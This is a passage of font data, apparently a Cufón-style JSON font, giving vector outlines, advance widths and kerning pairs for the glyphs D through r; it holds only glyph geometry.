":-1,"Y":-11,"S":-2,"Q":13,"G":13,"?":-7,";":-14,":":-14,"\/":-15,".":-14,",":-14,"*":-6,"!":-7,"A":-12,"\u00a5":-12,"T":-8,"a":-2,"\u00b9":-2,"e":7,"\u00ea":7,"o":4,"C":13,"\u00c6":13,"O":13}},"D":{"d":"78,-240v66,2,82,45,84,120v3,98,-41,129,-140,120r0,-240r56,0xm41,-14v78,6,99,-26,99,-105v0,-77,-19,-115,-99,-106r0,211","w":175,"k":{"\u0105":2,"\u00ff":-8,"\u2019":-1,"\u201d":-1,"\u2014":-5,"\u2013":-5,"\u2026":23,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"y":-8,"w":-8,"v":-8,"Z":8,"Y":2,"?":5,";":-7,":":-7,"\/":15,".":23,"-":-5,",":23,"T":14,"a":2,"\u00b9":2}},"E":{"d":"136,0r-114,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13","w":146,"k":{"\u00ea":7,"\u00c6":6,"\u00a5":-8,"\u00b9":2,"o":7,"e":7,"a":2,"W":-5,"T":-4,"O":6,"C":6,"A":-8,"\u0105":2,"\u0119":7,"\u0106":6,"\u0104":-8,"\u00d2":6,"\u00d4":6,"\u00d3":6,"\u00c1":-8,"\u00c2":-8,"\u2019":-1,"\u201d":-1,"\u2014":5,"\u2013":5,"\u00d5":6,"\u00c3":-8,"\u00c0":-8,"\u2026":-10,"\u00f8":7,"\u00d8":6,"\u2122":-12,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00ef":-10,"\u00ec":-22,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":7,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"\u00d6":6,"\u00c7":6,"\u00c5":-8,"\u00c4":-8,"z":-5,"x":-5,"u":2,"q":7,"g":-5,"d":7,"c":7,"Z":-7,"Y":-7,"X":-4,"V":-7,"S":1,"Q":6,"G":6,";":-10,":":-10,"\/":-7,".":-10,"-":5,",":-10,"*":-6}},"F":{"d":"135,-227r-94,4r0,92r86,0r0,14r-86,0r0,117r-19,0r0,-240r113,0r0,13","w":139,"k":{"\u0105":17,"\u0119":7,"\u0106":4,"\u0104":13,"\u00d2":4,"\u00d4":4,"\u00d3":4,"\u00c1":13,"\u00c2":13,"\u2019":-10,"\u201d":-10,"\u2014":2,"\u2013":2,"\u00d5":4,"\u00c3":13,"\u00c0":13,"\u2026":53,"\u00f8":7,"\u00d8":4,"\u2122":-19,"\u00fc":5,"\u00fb":5,"\u00f9":5,"\u00fa":5,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00ef":-14,"\u00ee":-7,"\u00ec":-29,"\u00ed":2,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":7,"\u00e5":17,"\u00e3":17,"\u00e4":17,"\u00e2":17,"\u00e0":17,"\u00e1":17,"\u00d6":4,"\u00c7":4,"\u00c5":13,"\u00c4":13,"u":5,"r":5,"q":7,"p":5,"n":5,"m":5,"i":2,"d":7,"c":7,"Y":-15,"S":-1,"Q":4,"G":4,"?":-7,";":-5,":":-5,"\/":29,".":53,"-":2,",":53,"*":-12,"A":13,"\u00a5":13,"T":-11,"a":17,"\u00b9":17,"e":7,"\u00ea":7,"o":7,"C":4,"\u00c6":4,"O":4}},"G":{"d":"36,-115v-1,62,12,101,66,102v14,0,29,-3,43,-11r0,-90r-59,0r0,-16r78,0r0,118v-85,39,-150,8,-150,-103v0,-116,69,-158,140,-106r-11,13v-15,-13,-31,-20,-48,-20v-51,0,-58,49,-59,113","w":183,"k":{"\u00a5":-2,"\u00b9":-2,"a":-2,"W":6,"T":12,"A":-2,"\u0105":-2,"\u0104":-2,"\u00c1":-2,"\u00c2":-2,"\u2019":14,"\u201d":14,"\u2014":-2,"\u2013":-2,"\u00c3":-2,"\u00c0":-2,"\u2122":7,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00c5":-2,"\u00c4":-2,"Y":10,"?":2,"\/":2,"-":-2,"*":12,"!":2}},"H":{"d":"166,0r-19,0r0,-120r-106,0r0,120r-19,0r0,-240r19,0r0,106r106,0r0,-106r19,0r0,240","w":187,"k":{"\u00ec":-10}},"I":{"d":"41,0r-19,0r0,-240r19,0r0,240","w":62,"k":{"\u00ec":-10}},"J":{"d":"5,36v16,-20,17,-24,17,-61r0,-215r19,0v-3,82,6,183,-5,255v-4,10,-11,20,-22,29","w":62,"k":{"\u00ec":-10}},"K":{"d":"162,0r-26,0r-95,-123r0,123r-19,0r0,-240r19,0r0,108r85,-108r23,0r-89,112","k":{"\u0105":-2,"\u0119":7,"\u0106":15,"\u0104":-19,"\u00d9":10,"\u00db":10,"\u00da":10,"\u00d2":15,"\u00d4":15,"\u00d3":15,"\u00c1":-19,"\u00c2":-19,"\u00ff":17,"\u2014":14,"\u2013":14,"\u00d5":15,"\u00c3":-19,"\u00c0":-19,"\u2026":-24,"\u00f8":5,"\u00d8":15,"\u2122":-12,"\u00ae":19,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00ef":-5,"\u00ec":-17,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":5,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00dc":10,"\u00d6":15,"\u00c7":15,"\u00c5":-19,"\u00c4":-19,"y":17,"w":13,"v":18,"u":4,"q":5,"d":5,"c":5,"Y":-10,"U":10,"S":-2,"Q":15,"G":15,"?":-10,";":-24,":":-24,"\/":-19,".":-24,"-":14,",":-24,"*":5,"!":-10,"A":-19,"\u00a5":-19,"T":-5,"a":-2,"\u00b9":-2,"e":7,"\u00ea":7,"o":5,"C":15,"\u00c6":15,"O":15}},"L":{"d":"127,0r-105,0r0,-240r19,0r0,223r86,5r0,12","w":127,"k":{"\u0105":-4,"\u0119":8,"\u0106":13,"\u0104":-19,"\u00d9":8,"\u00db":8,"\u00da":8,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-19,"\u00c2":-19,"\u00ff":10,"\u2019":24,"\u201d":24,"\u2014":10,"\u2013":10,"\u00d5":13,"\u00c3":-19,"\u00c0":-19,"\u2026":-18,"\u00f8":5,"\u00d8":13,"\u2122":36,"\u00ae":24,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00eb":8,"\u00e8":8,"\u00e9":8,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":8,"\u00d6":13,"\u00c7":13,"\u00c5":-19,"\u00c4":-19,"y":10,"w":10,"u":2,"Z":-17,"Y":32,"V":22,"U":8,"S":-7,"Q":13,"M":-10,"G":13,"?":-7,";":-18,":":-18,"\/":-17,".":-18,"-":10,",":-18,"*":46,"!":-7,"A":-19,"\u00a5":-19,"T":31,"W":14,"a":-4,"\u00b9":-4,"e":8,"\u00ea":8,"o":5,"C":13,"\u00c6":13,"O":13}},"M":{"d":"233,0r-19,0r-21,-206r-60,206r-20,0r-60,-207r-22,207r-19,0r26,-240r24,0r60,213r61,-213r24,0","w":245,"k":{"\u00a5":-7,"\u00b9":-4,"a":-4,"A":-7,"\u0105":-4,"\u0104":-7,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00c1":-7,"\u00c2":-7,"\u00ff":4,"\u2019":10,"\u201d":10,"\u00c3":-7,"\u00c0":-7,"\u2026":-10,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":4,"\u00c5":-7,"\u00c4":-7,"y":4,"u":2,"Y":12,"U":4,"S":2,";":-10,":":-10,"\/":-7,".":-10,",":-10}},"N":{"d":"171,0r-23,0r-107,-205r0,205r-19,0r0,-240r22,0r107,206r0,-206r20,0r0,240","w":192,"k":{"\u00ec":-10}},"O":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110","w":188,"k":{"\u0105":2,"\u00ff":-8,"\u2014":-5,"\u2013":-5,"\u2026":19,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"z":-2,"y":-8,"x":-2,"w":-8,"v":-8,"t":-5,"f":-5,"Z":10,"Y":6,"X":11,"?":5,";":-7,":":-7,"\/":14,".":19,"-":-5,",":19,"T":19,"a":2,"\u00b9":2}},"P":{"d":"22,-240v66,-5,118,3,118,66v0,57,-35,73,-99,69r0,105r-19,0r0,-240xm41,-118v49,3,79,-8,79,-55v0,-46,-31,-56,-79,-52r0,107","w":147,"k":{"\u0105":14,"\u0119":14,"\u0104":17,"\u00c1":17,"\u00c2":17,"\u00ff":-10,"\u2019":-12,"\u201d":-12,"\u2014":17,"\u2013":17,"\u00c3":17,"\u00c0":17,"\u2026":67,"\u00f8":8,"\u00ae":-7,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":12,"\u00f6":12,"\u00f4":12,"\u00f2":12,"\u00f3":12,"\u00ef":-7,"\u00ee":-12,"\u00ec":-12,"\u00eb":14,"\u00e8":14,"\u00e9":14,"\u00e5":14,"\u00e3":14,"\u00e4":14,"\u00e2":14,"\u00e0":14,"\u00e1":14,"\u00c5":17,"\u00c4":17,"y":-10,"u":2,"r":2,"Y":-8,"S":-7,"?":5,"\/":36,".":67,"-":17,",":67,"*":-10,"A":17,"\u00a5":17,"T":-1,"a":14,"\u00b9":14,"e":14,"\u00ea":14,"o":12}},"Q":{"d":"94,-243v96,-6,98,180,49,228v-11,11,-26,17,-44,19v-8,16,9,23,29,18r0,13v-26,9,-64,-1,-43,-31v-54,-13,-70,-51,-71,-124v-1,-69,21,-119,80,-123xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110","w":188,"k":{"\u00b9":2,"a":2,"\u0105":2,"\u00ff":-8,"\u2014":-5,"\u2013":-5,"\u2026":19,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"y":-8,"t":-5,"Y":6,"?":5,";":-7,":":-7,"\/":14,".":19,"-":-5,",":19}},"R":{"d":"140,-181v0,43,-36,67,-81,61r105,120r-27,0r-96,-117r0,117r-19,0r0,-240v61,-3,118,0,118,59xm120,-181v0,-39,-35,-47,-79,-44r0,93v46,3,79,-10,79,-49","w":155,"k":{"\u0119":7,"\u0106":6,"\u0104":-21,"\u00d9":6,"\u00db":6,"\u00da":6,"\u00d2":6,"\u00d4":6,"\u00d3":6,"\u00c1":-21,"\u00c2":-21,"\u00ff":-2,"\u2019":-4,"\u201d":-4,"\u2014":19,"\u2013":19,"\u00d5":6,"\u00c3":-21,"\u00c0":-21,"\u2026":-24,"\u00f8":4,"\u00d8":6,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00ef":-5,"\u00ee":-5,"\u00ec":-5,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00dc":6,"\u00d6":6,"\u00c7":6,"\u00c5":-21,"\u00c4":-21,"y":-2,"u":2,"t":-5,"Z":-15,"Y":-2,"X":-17,"V":-5,"U":6,"S":-4,"Q":6,"M":-7,"G":6,"?":-7,";":-24,":":-24,"\/":-19,".":-24,"-":19,",":-24,"!":-7,"A":-21,"\u00a5":-21,"T":6,"W":-2,"e":7,"\u00ea":7,"o":4,"C":6,"\u00c6":6,"O":6}},"S":{"d":"30,-182v3,64,116,47,112,120v-3,62,-78,83,-131,50r7,-16v41,26,103,19,103,-32v0,-67,-110,-47,-110,-121v0,-52,62,-77,113,-54r-6,16v-37,-19,-90,-4,-88,37","w":152,"k":{"\u00ea":-2,"\u00c6":1,"\u00a5":-2,"\u00b9":-5,"o":-2,"e":-2,"a":-5,"W":4,"T":12,"O":1,"C":1,"A":-2,"\u0105":-5,"\u0119":-2,"\u0106":1,"\u0104":-2,"\u00d2":1,"\u00d4":1,"\u00d3":1,"\u00c1":-2,"\u00c2":-2,"\u00ff":1,"\u2019":14,"\u201d":14,"\u2014":-8,"\u2013":-8,"\u00d5":1,"\u00c3":-2,"\u00c0":-2,"\u2026":5,"\u00f8":-2,"\u00d8":1,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00eb":-2,"\u00e8":-2,"\u00e9":-2,"\u00e7":-2,"\u00e5":-5,"\u00e3":-5,"\u00e4":-5,"\u00e2":-5,"\u00e0":-5,"\u00e1":-5,"\u00d6":1,"\u00c7":1,"\u00c5":-2,"\u00c4":-2,"y":1,"v":1,"q":-2,"d":-2,"c":-2,"Y":8,"V":5,"S":5,"Q":1,"G":1,"\/":2,".":5,"-":-8,",":5,"*":10}},"T":{"d":"142,-227r-62,4r0,223r-19,0r0,-222r-61,-5r0,-13r142,0r0,13","w":141,"k":{"\u0105":37,"\u0119":39,"\u0106":19,"\u0104":29,"\u00d2":19,"\u00d4":19,"\u00d3":19,"\u00c1":29,"\u00c2":29,"\u2019":-11,"\u201d":-11,"\u2014":33,"\u2013":33,"\u00d5":19,"\u00c3":29,"\u00c0":29,"\u2026":36,"\u00f8":39,"\u00d8":19,"\u2122":-24,"\u00ae":7,"\u00fc":26,"\u00f3":39,"\u00ef":-22,"\u00ee":-7,"\u00ec":-31,"\u00d6":19,"\u00c7":19,"\u00c5":29,"\u00c4":29,"y":36,"w":36,"v":36,"u":38,"s":38,"r":38,"q":39,"c":39,"Z":-5,"Y":-20,"V":-22,"S":2,"Q":19,"G":19,"?":-12,";":29,":":29,"\/":26,".":36,"-":33,",":36,"*":-14,"!":-7,"A":29,"\u00a5":29,"T":-12,"W":-16,"a":37,"\u00b9":37,"e":39,"\u00ea":39,"o":39,"C":19,"\u00c6":19,"O":19}},"U":{"d":"95,-13v34,0,55,-22,55,-57r0,-170r19,0r0,170v3,49,-30,74,-74,74v-44,0,-73,-26,-73,-74r0,-170r19,0r0,170v-1,35,20,57,54,57","w":190,"k":{"\u2026":13,"\u00ec":-10,"x":4,"X":5,"M":4,"\/":10,".":13,",":13}},"V":{"d":"153,-240r-67,240r-24,0r-66,-240r21,0r57,218r57,-218r22,0","w":148,"k":{"\u00ea":13,"\u00a5":13,"\u00b9":14,"o":13,"e":13,"a":14,"W":-14,"A":13,"\u0105":14,"\u0119":13,"\u0104":13,"\u00c1":13,"\u00c2":13,"\u2019":-15,"\u201d":-15,"\u2014":12,"\u2013":12,"\u00c3":13,"\u00c0":13,"\u2026":33,"\u00f8":13,"\u2122":-19,"\u00fc":7,"\u00fb":7,"\u00f9":7,"\u00fa":7,"\u00f5":13,"\u00f6":13,"\u00f4":13,"\u00f2":13,"\u00f3":13,"\u00ef":-22,"\u00ee":-19,"\u00ec":-31,"\u00eb":13,"\u00e8":13,"\u00e9":13,"\u00e5":14,"\u00e3":14,"\u00e4":14,"\u00e2":14,"\u00e0":14,"\u00e1":14,"\u00c5":13,"\u00c4":13,"u":7,"s":6,"r":7,"p":7,"n":7,"m":7,"l":-2,"k":-2,"h":-2,"b":-2,"Y":-19,"V":-17,"S":-7,"?":-14,";":5,":":5,"\/":21,".":33,"-":12,",":33,"*":-14,"!":-7}},"W":{"d":"243,-240r-47,240r-24,0r-50,-213r-50,213r-23,0r-47,-240r21,0r38,212r49,-212r25,0r49,212r38,-212r21,0","w":245,"k":{"\u0105":12,"\u0119":11,"\u0104":10,"\u00c1":10,"\u00c2":10,"\u00ff":-2,"\u2019":-11,"\u201d":-11,"\u2014":6,"\u2013":6,"\u00c3":10,"\u00c0":10,"\u2026":22,"\u00f8":9,"\u2122":-19,"\u00fc":7,"\u00fb":7,"\u00f9":7,"\u00fa":7,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00ef":-17,"\u00ee":-14,"\u00ec":-24,"\u00eb":11,"\u00e8":11,"\u00e9":11,"\u00e7":11,"\u00e5":12,"\u00e3":12,"\u00e4":12,"\u00e2":12,"\u00e0":12,"\u00e1":12,"\u00c5":10,"\u00c4":10,"y":-2,"u":7,"t":-7,"s":2,"r":7,"n":7,"m":7,"l":-2,"k":-2,"h":-2,"d":11,"c":11,"b":-2,"Y":-17,"X":-10,"V":-14,"S":-7,"?":-14,"\/":12,".":22,"-":6,",":22,"*":-14,"!":-7}},"X":{"d":"157,0r-22,0r-57,-120r-56,120r-22,0r65,-130r-57,-110r22,0r48,96r49,-96r22,0r-57,110","w":156,"k":{"\u00ea":5,"\u00c6":11,"\u00a5":-14,"\u00b9":-4,"o":1,"e":5,"a":-4,"T":-7,"O":11,"C":11,"A":-14,"\u0105":-4,"\u0119":5,"\u0106":11,"\u0104":-14,"\u00d9":5,"\u00db":5,"\u00da":5,"\u00d2":11,"\u00d4":11,"\u00d3":11,"\u00c1":-14,"\u00c2":-14,"\u00ff":11,"\u2019":-1,"\u201d":-1,"\u2014":8,"\u2013":8,"\u00d5":11,"\u00c3":-14,"\u00c0":-14,"\u2026":-18,"\u00f8":1,"\u00d8":11,"\u2122":-12,"\u00ae":12,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":1,"\u00f6":1,"\u00f4":1,"\u00f2":1,"\u00f3":1,"\u00ef":-5,"\u00ee":-5,"\u00ec":-17,"\u00eb":5,"\u00e8":5,"\u00e9":5,"\u00e7":1,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":5,"\u00d6":11,"\u00c7":11,"\u00c5":-14,"\u00c4":-14,"y":11,"u":4,"q":1,"d":1,"c":1,"Y":-10,"X":-14,"U":5,"Q":11,"G":11,";":-18,":":-18,"\/":-21,".":-18,"-":8,",":-18}},"Y":{"d":"156,-240r-72,137r0,103r-20,0r0,-103r-71,-137r23,0r58,119r58,-119r24,0","w":149,"k":{"\u00ea":33,"\u00c6":6,"\u00a5":25,"\u00b9":31,"o":33,"e":33,"a":31,"T":-21,"O":6,"C":6,"A":25,"\u0105":31,"\u0119":33,"\u0106":6,"\u0104":25,"\u00d2":6,"\u00d4":6,"\u00d3":6,"\u00c1":25,"\u00c2":25,"\u2019":-14,"\u201d":-14,"\u2014":36,"\u2013":36,"\u00d5":6,"\u00c3":25,"\u00c0":25,"\u2026":43,"\u00f8":33,"\u00d8":6,"\u2122":-19,"\u00ae":7,"\u00fc":22,"\u00fb":22,"\u00f9":22,"\u00fa":22,"\u00f5":33,"\u00f6":33,"\u00f4":33,"\u00f2":33,"\u00f3":33,"\u00ef":-19,"\u00ee":-14,"\u00ec":-33,"\u00eb":33,"\u00e8":33,"\u00e9":33,"\u00e7":33,"\u00e5":31,"\u00e3":31,"\u00e4":31,"\u00e2":31,"\u00e0":31,"\u00e1":31,"\u00d6":6,"\u00c7":6,"\u00c5":25,"\u00c4":25,"z":13,"w":10,"v":10,"u":22,"s":22,"r":22,"q":33,"p":22,"n":22,"m":22,"d":33,"c":33,"Z":-8,"Y":-19,"Q":6,"M":12,"G":6,"?":-14,";":24,":":24,"\/":29,".":43,"-":36,",":43,"*":-10,"!":-7}},"Z":{"d":"135,0r-133,0r0,-15r111,-210r-103,-2r0,-13r125,0r0,15r-111,209r111,2r0,14","w":140,"k":{"\u00ea":10,"\u00c6":12,"\u00a5":-12,"o":7,"e":10,"O":12,"C":12,"A":-12,"\u0119":10,"\u0106":12,"\u0104":-12,"\u00d2":12,"\u00d4":12,"\u00d3":12,"\u00c1":-12,"\u00c2":-12,"\u00ff":4,"\u2019":-10,"\u201d":-10,"\u2014":19,"\u2013":19,"\u00d5":12,"\u00c3":-12,"\u00c0":-12,"\u2026":-17,"\u00d8":12,"\u2122":-19,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00ef":-14,"\u00ee":-10,"\u00ec":-26,"\u00eb":10,"\u00e8":10,"\u00e9":10,"\u00d6":12,"\u00c7":12,"\u00c5":-12,"\u00c4":-12,"y":4,"u":2,"Z":-11,"Y":-12,"S":-2,"Q":12,"G":12,"?":-7,";":-17,":":-17,"\/":-12,".":-17,"-":19,",":-17,"*":-10,"!":-5}},"[":{"d":"65,25r-43,0r0,-290r43,0r0,18r-24,0r0,254r24,0r0,18","w":72},"\\":{"d":"116,3r-14,0r-88,-246r15,0","w":130},"]":{"d":"51,25r-44,0r0,-18r24,0r0,-254r-24,0r0,-18r44,0r0,290","w":72},"^":{"d":"93,-120v4,7,23,14,14,20r-17,-17v-7,4,-13,21,-21,14r18,-17v-4,-7,-23,-14,-14,-20r17,17v7,-4,13,-21,21,-14","w":180},"_":{"d":"133,41r-133,0r0,-12r133,0r0,12","w":132},"`":{"d":"75,-197r-10,10r-55,-36r15,-16","w":84},"a":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35","k":{"\u2019":11,"\u201d":11,"\u2122":12,"z":-2,"s":2,"*":10}},"b":{"d":"86,-167v42,0,62,38,62,84v0,70,-59,113,-109,68r0,15r-17,0r0,-239r18,-4r0,94v11,-11,29,-19,46,-18xm83,-15v32,-1,44,-30,44,-67v0,-68,-47,-83,-87,-51r0,102v13,8,27,16,43,16","w":162,"k":{"\u2019":14,"\u201d":14,"\u2014":-5,"\u2013":-5,"\u2026":12,"\u2122":12,";":-4,":":-4,"\/":7,".":12,"-":-5,",":12,"*":10}},"c":{"d":"35,-81v0,57,47,90,85,50r7,17v-51,43,-113,3,-113,-66v0,-70,60,-113,113,-69r-8,15v-40,-37,-84,-4,-84,53","w":132,"k":{"\u00ea":7,"o":7,"e":7,"\u0119":7,"\u00ff":-8,"\u2019":-7,"\u201d":-7,"\u2014":7,"\u2013":7,"\u2026":-14,"\u00f8":7,"\u00ae":-12,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":7,"y":-8,"t":-7,"q":7,"d":7,"c":7,"?":-2,";":-12,":":-12,"\/":-12,".":-14,"-":7,",":-12,"*":-10,"!":-2}},"d":{"d":"14,-80v0,-68,61,-114,109,-69r0,-90r19,-4r0,243r-18,0r0,-16v-49,47,-110,4,-110,-64xm36,-81v0,59,46,87,87,50r0,-101v-41,-39,-87,-10,-87,51","w":163,"k":{"\u00ec":-7}},"e":{"d":"82,-167v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-66,26,-126,-4,-126,-78v0,-48,23,-83,68,-83xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0","w":158,"k":{"\u2019":13,"\u201d":13,"\u2014":-7,"\u2013":-7,"\u2122":12,"x":2,"g":-2,";":-7,":":-7,"\/":5,"-":-7,"*":11}},"f":{"d":"23,-163v-7,-55,13,-92,68,-76r-5,16v-25,-8,-44,-1,-44,29r0,31r45,0r0,14r-45,2r0,147r-19,0r0,-147r-22,-2r0,-14r22,0","w":79,"k":{"\u00ea":7,"\u00b9":6,"o":6,"e":7,"a":6,"\u0105":6,"\u0119":7,"\u00ff":-17,"\u2019":-21,"\u201d":-21,"\u2014":10,"\u2013":10,"\u2026":14,"\u00f8":6,"\u2122":-29,"\u00ae":-17,"\u00fc":-4,"\u00fb":-4,"\u00f9":-4,"\u00fa":-4,"\u00f5":6,"\u00f6":6,"\u00f4":6,"\u00f2":6,"\u00f3":6,"\u00ef":-26,"\u00ee":-22,"\u00ec":-38,"\u00ed":-4,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":2,"\u00e5":6,"\u00e3":6,"\u00e4":6,"\u00e2":6,"\u00e0":6,"\u00e1":6,"y":-17,"w":-14,"v":-14,"u":-4,"t":-17,"s":-6,"r":-4,"q":2,"p":-4,"n":-4,"m":-4,"l":-5,"k":-5,"j":-5,"i":-5,"h":-5,"f":-17,"d":5,"c":5,"b":-5,"?":-17,";":-12,":":-12,"\/":10,".":14,"-":10,",":14,"*":-24,"!":-14}},"g":{"d":"127,24v2,-42,-106,0,-114,-37v4,-16,18,-26,32,-38v-53,-23,-37,-116,32,-116v20,0,34,5,45,16v8,-13,14,-18,30,-17r0,19v-12,-2,-12,0,-22,7v28,51,-8,113,-74,95v-30,28,-38,34,23,34v40,0,67,3,68,36v0,31,-22,46,-67,46v-48,-1,-70,-14,-69,-47r20,0v1,26,18,31,48,31v32,0,48,-10,48,-29xm76,-60v26,0,42,-18,42,-45v0,-29,-15,-48,-41,-48v-26,0,-43,19,-43,46v0,28,16,47,42,47","w":152,"k":{"\u00b9":6,"a":6,"\u0105":6,"\u00ff":-12,"\u2019":-19,"\u201d":-19,"\u2014":-5,"\u2013":-5,"\u2026":-7,"\u2122":-12,"\u00ae":-19,"\u00e5":6,"\u00e3":6,"\u00e4":6,"\u00e2":6,"\u00e0":6,"\u00e1":6,"y":-14,"w":-14,"v":-14,"t":-12,"s":-5,"j":-2,"g":-2,"f":-12,";":-14,":":-7,"\/":-7,".":-7,"-":-5,",":-14,"*":-17,"!":-7}},"h":{"d":"40,-149v35,-32,103,-27,103,35r0,114r-18,0v-8,-56,25,-153,-37,-153v-19,0,-33,9,-48,20r0,133r-18,0r0,-239r18,-4r0,94","w":164,"k":{"\u2019":12,"\u201d":12,"\u2122":10,"*":7}},"i":{"d":"31,-239v7,0,12,8,12,17v0,9,-5,17,-12,17v-15,-1,-15,-33,0,-34xm41,0r-19,0r0,-163r19,-4r0,167","w":62,"k":{"\u2019":-2,"\u201d":-2}},"j":{"d":"30,-239v7,0,12,8,12,17v0,9,-5,17,-12,17v-7,0,-12,-8,-12,-17v0,-9,5,-17,12,-17xm2,61v15,-12,19,-20,19,-49r0,-175r19,-4v-3,69,7,157,-6,215v-5,9,-20,27,-32,13","w":61,"k":{"\u2019":-2,"\u201d":-2}},"k":{"d":"144,0r-26,0r-78,-90r0,90r-18,0r0,-239r18,-4r0,136r59,-56r24,0r-66,64","w":133,"k":{"\u00ea":7,"\u00b9":-2,"o":6,"e":7,"a":-2,"\u0105":-2,"\u0119":7,"\u00ff":-2,"\u2019":-7,"\u201d":-7,"\u2014":17,"\u2013":17,"\u2026":-26,"\u00f8":6,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":6,"\u00f6":6,"\u00f4":6,"\u00f2":6,"\u00f3":6,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":6,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"y":-2,"u":4,"s":-7,"q":6,"j":-5,"d":6,"c":6,"?":-12,";":-26,":":-26,"\/":-22,".":-26,"-":17,",":-26,"!":-12}},"l":{"d":"40,0r-18,0r0,-239r18,-4r0,243","w":61,"k":{"\u00ec":-10}},"m":{"d":"128,-146v35,-35,101,-28,101,33r0,113r-19,0v-7,-56,23,-150,-34,-152v-13,0,-27,6,-42,19r0,133r-18,0r-1,-127v-9,-31,-48,-32,-75,-9r0,136r-18,0r0,-163r18,-4r0,15v30,-23,70,-22,88,6","w":250,"k":{"\u2019":12,"\u201d":12,"\u2122":10,"*":7}},"n":{"d":"40,-150v33,-28,103,-27,103,36r0,114r-18,0v-7,-56,24,-152,-37,-152v-15,-1,-37,9,-48,19r0,133r-18,0r0,-163r18,-4r0,17","w":164,"k":{"\u2019":12,"\u201d":12,"\u2122":10,"*":7}},"o":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70","w":165,"k":{"\u2019":14,"\u201d":14,"\u2014":-5,"\u2013":-5,"\u2026":10,"\u2122":12,"z":4,"x":4,";":-5,":":-5,"\/":6,".":10,"-":-5,",":10,"*":11}},"p":{"d":"40,-147v47,-48,115,-1,108,67v7,68,-62,109,-108,66r0,78r-18,0r0,-227r15,-4xm40,-31v42,36,88,11,88,-49v0,-58,-45,-90,-88,-53r0,102","w":162,"k":{"\u2019":14,"\u201d":14,"\u2014":-5,"\u2013":-5,"\u2026":10,"\u2122":12,";":-5,":":-5,"\/":6,".":10,"-":-5,",":10,"*":11}},"q":{"d":"14,-77v0,-68,60,-119,109,-71r0,-15r19,-4r0,231r-19,0r0,-78v-48,43,-109,3,-109,-63xm81,-149v-59,1,-64,137,1,135v13,0,27,-5,41,-17r0,-101v-16,-11,-30,-17,-42,-17","w":163,"k":{";":-7,",":-7}},"r":{"d":"81,-166r-3,21v-17,-3,-26,1,-37,10r0,135r-19,0r0,-163r19,0r0,13v12,-10,25,-15,40,-16","w":80